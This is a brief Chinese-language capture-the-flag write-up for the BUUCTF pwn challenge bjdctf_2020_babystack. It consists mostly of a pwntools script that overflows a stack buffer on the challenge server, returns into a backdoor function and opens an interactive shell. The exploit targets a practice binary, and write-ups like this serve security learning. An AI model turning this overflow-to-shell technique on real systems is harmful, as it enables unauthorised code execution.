[BUUCTF-pwn]——bjdctf_2020_babystack
Linux中checksec一下 , 64位的我们要小心参数小于6位的函数.
IDA中看看
看到这里不用我多说了吧, So easy !!!
exploit
from pwn import *
p = remote("node3.buuoj.cn",25355)
sys = 0x04006EA
p.sendlineafter("[+]Please input the length of your name:\n",'200')
payload = 'a' * (0x10 + 0x8) + p64(sys)
p.sendlineafter("[+]What's u name?\n",payload)
p.interactive()